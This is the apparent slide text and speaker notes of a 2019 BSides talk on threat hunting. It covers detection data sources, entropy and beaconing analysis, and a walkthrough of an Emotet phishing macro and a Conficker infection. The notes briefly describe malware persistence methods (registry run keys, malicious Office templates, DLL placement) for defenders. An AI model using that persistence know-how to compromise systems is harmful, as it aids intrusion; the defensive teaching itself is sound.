CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...
Bsides 2019 - Intelligent Threat Hunting
1. Intelligent Threat Hunting
Dhruv Majumdar
Technical lead and Sr. Security Analyst of ElevatedPrompt Solutions
March 18, 2019 | Vancouver, BC
2. Agenda
▪ WHOAMI
▪ Threat Hunting Basics
▪ Threat Hunting Recipe
▪ Attack Life Cycle and few ways of detections
▪ Things to Look for
– Mitre ATT&CK
▪ Attack ScenarioWalk through
▪ Conclusion
3. whoami
▪ Dhruv Majumdar – Technical lead and Sr. Security Analyst for
ElevatedPrompt Solutions
▪ Career
▪ Hobbies
– Photography
– Breaking stuff
Disclaimer:
Please note that all opinions expressed are my own.
All content is owned by ElevatedPrompt Solutions
Inc and cannot be copied, distributed or repurposed
without prior consent
4. Threat Hunting Basics
WHAT DO WE DO ?
“PROACTIVELY & ITERATIVELY searching through the
environments to DETECT & ISOLATE threats that EVADE
EXISTINGSECURITYSOLUTIONS”
5. Continued……
Traditional SOC
• Predominantly Reactive
and Product driven
• Signature based & Alert
driven
Threat Hunting
• Proactive and Team Work
• Detect anomalies*
• F3EAD
7. Important Data sources
SIEM
Threat Intel (STIX / TAXII)
Network Data Host Data
Bro
Snort
Moloch
Proxy Logs
Mail Server logs
Windows Event logs
Sysmon
GRR
Auditd
OSSEC
13. Attack Scenario Walk through
Phishing / Office Macro
What Datapoints do we need?
- Process execution data
- Enhanced Powershell Logging
- Email logs
Hunt Hypothesis?
- Searching Office Programs launching VB, Powershell or Command line arguments
- Persistence mechanisms
- Unknown file hash
What Data Sources are required?
- Sysmon
- Windows Events Logs
- Email Logs
- (some sort of network based events?)
15. Email Url Analysis
Email that got delivered on a shared mail box
Loads this java script
Redirects to an Ad
network
16. Frist analysis of the url flagged the analysis for further investigation…
We see the directory was
recently updated
Malicious xml doc
Feed the IOC into your Threat Intelligence Platform
and time to Blog/ present.
21. Conclusion
• Massive shortage of Cybersecurity Professionals
• Demand for experiencedThreat Hunters
• Consider threat detection as a standalone function
How to get started?
SOF ELK - https://github.com/philhagen/sof-elk
Security Onion - https://github.com/Security-Onion-Solutions/security-onion
Hunting ELK - https://github.com/Cyb3rWard0g/HELK
@neondhruv
https://www.linkedin.com/in/neondhruv/
Editor's Notes
Things I want to cover in todays talk
What I do and few personal traits, so that people can related with me and come forward by the end of the talk and socialize.
What is Threat Hunting and Why is it needed ?
- Mitre Attack framework tells us exactly what indicators to look for
The process always begins from a hypothesis, and common thought that a breach has already happened .
From my perspective Threat Hunting is doing a continuous DIFR of your Environment.
Threat Hunting -- Starts with people and uses technology to achieve the common goal
What is F3EAD ?
>> Find, Fix, Finish, Exploit & Analyze & Disehmuhnation
Pentesters
Infrastructures
Web Applications
Security Researcher/ Consultant
Exploit Developer
Detection Evader
Reverse Engineers
RED team strategist/ Simulator
SOC Analyst
Incident Handler
Forensic Analyst | DFIR
HIDS
NIDS
Malware Analyst
Threat Intelligence
Log management Solution (Hadoop, Apache Spark)
This gives us the edge over traditional AV. Which are mostly signature based.
Important sources of Data Point that are needed in order to achieve a Basic level of complete visibility in an environment.
Network Data & Host based Data
BRO, SNORT , MOLOCH, PROXY LOGS, MAIL SERVER LOGS
WINDOWS EVENTS LOGS, GRR, SYSMON , OSSEC, OSQUERRY, Auditd.
Importance of Host Based Analysis
To detect Persistence
Priv. Esc
Code Execution
Exploits
exfiltration of data
Importance of Network Based Data
C2
Payloads
Patterns
Lateral Movement
exfiltration of data
Threat Intelligence
STIX Gives the structure of way the Threat Intel that’s being generated can be shared
TAXI It defines the process of how the data can be shared
Active Defence Honeypots of various interaction levels, being deployed in the env to slow the attacker down and also to alert the SOC.
OSINT Leveraging Shodan, pastebin, Darkweb to gain tactical threat intelligence and build action items/ or work on the action items as you find them.
Main motive of the Blue teams or the Threat Hunter is to Contain the situation before the attacker reaches their objective.
and every time make a use case to have it monitored and add to your use cases.
Till now I was bringing you all up to speed.
Here I’ll try to demonstrate, how you can leverage all these intelligence together to protect your environment.
Here what you are looking at is a HTTP Beaconing Pattern which was more than enough to draw our attention into this leading us to uncover the conflicker Worm .
Conficker Worm .
F-Secure did an excellent write up on it.
Here is the finding after a deeper dive ..
An instant give away that this is a case of a worm that leverages Domain Generated Algorithm to talk back to its C2 .
At this point. You would want to extract out the host and take a deeper dive also start interacting with other IT groups in the Org to pull the plug on this box and do deeper analysis ..
We did match the domains and found out this was Conficker Worm.
As a threat hunter you need some arsenals to help you fight the cause and Detect what’s the Anomality
We leverage various methods to help aid this cause and few of these are Shannon Entropy, JA3, Beacon Patten analysis, url extractions from Emails and checking the entropy of the domains, etc
here is the example of DNS and HTTP entropy
If you look close here you will see byte stream being passed over plain HTTP traffic on which we will be alerted on.
Rest of this presentation I’ll like to walk you guys through the kill chain process leveraging this example …
So this an example of a Phishing Email, with an Attachment
>>
2 Alerts generated
Auto Open Macro – when the malicious email is received .
Alert Terse Name - 2nd Stage payload – when the macro has been download and executed.
From our Host based data we can also see that the following TASK’s have occurred.
File Created
Run Keys Set for Persistence Mechanism
So the WinWord Process calls the cmd which then called the Powershell.
We get all this data from leveraging Sysmon.
RunKeys: Runkeys & Services are part of the registry; basically a way to execute automatically every time a user logs in .
The more modern malwares leverages
Office Template: MSOffice templates are part of the common office applications and are used to customized=s styles. So the base template is used each time an application starts.
.dotm template created that can be modified to include a malicious macro. Excel actually doesn’t have a template file by default but one can be created and added that will be automatically loaded .
dll: A Malware dll can be made persistent on a Windows host by simply residing in a specific directory with a specific name, with no evidence in the registry or Startup folder and no modified system binaries.
In this case we are dealing with Emotet and only dealing with credential stealing .
But this might very well be an ngRAT and will lead to Lateral Movement.